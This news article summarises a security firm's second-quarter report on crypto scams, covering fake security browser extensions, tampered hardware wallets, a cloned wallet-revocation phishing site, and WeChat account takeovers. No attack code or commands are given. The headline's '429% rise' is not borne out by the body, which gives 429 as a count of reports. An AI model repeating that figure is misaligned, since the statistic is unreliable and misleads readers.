Crypto Users Face 429% Rise in Sophisticated Scams in Q2

Crypto users faced a rise in “psychologically manipulative” attacks in the second quarter as hackers employed advanced and creative methods to steal crypto. According to blockchain security firm SlowMist, while there was no significant advancement in hacking techniques, the scams have become more sophisticated. This shift includes an increase in fake browser extensions, tampered hardware wallets, and social engineering attacks.

One notable trend observed was the shift from purely onchain attacks to offchain entry points. Attackers are now targeting browser extensions, social media accounts, authentication flows, and user behavior as common attack surfaces. This psychological manipulation aims to exploit users' trust and urgency, making it easier to manipulate them into sharing sensitive information or clicking malicious links.

One emerging attack vector involved malicious browser extensions masquerading as security plugins. For instance, the “Osiris” Chrome extension claimed to detect phishing links and suspicious websites. However, it intercepted all downloads of .exe, .dmg, and .zip files, replacing them with malicious programs. These programs collected sensitive information from the user’s computer, including Chrome browser data and macOS Keychain credentials, giving attackers access to seed phrases, private keys, or login credentials.

Another attack method focused on tricking crypto investors into adopting tampered hardware wallets. Hackers would send users compromised cold wallets, claiming they had won a free device or that their existing device was compromised. In one reported case, a victim lost $6.5 million by purchasing a tampered cold wallet seen on TikTok. Another attacker sold a victim a hardware wallet they had already pre-activated, allowing them to immediately drain the funds once the new users transferred in their crypto for storage.

Social engineering attacks also played a significant role. SlowMist was contacted by a user who could not revoke a “risky authorization” in their wallet. Upon investigation, it was found that the website the user was using was a near-perfect clone of the popular Revoke Cash interface. This phishing website used EmailJS to send users’ input, including private keys and addresses, to an attacker’s email inbox. These attacks exploit urgency and trust, prompting users to take hasty actions and share sensitive information.

Other attacks included phishing techniques that exploited EIP-7702, introduced in Ethereum’s latest Pectra upgrade, and targeted several WeChat users by gaining control of their accounts. Attackers utilized WeChat’s account recovery system to impersonate the real owner and scam their contacts with discounted Tether (USDT).

SlowMist’s Q2 data came from 429 stolen fund reports submitted to the firm during the second quarter. The firm said it froze and recovered around $12 million from 11 victims who reported having crypto stolen in Q2. This highlights the increasing sophistication and psychological manipulation tactics used by attackers in the crypto space.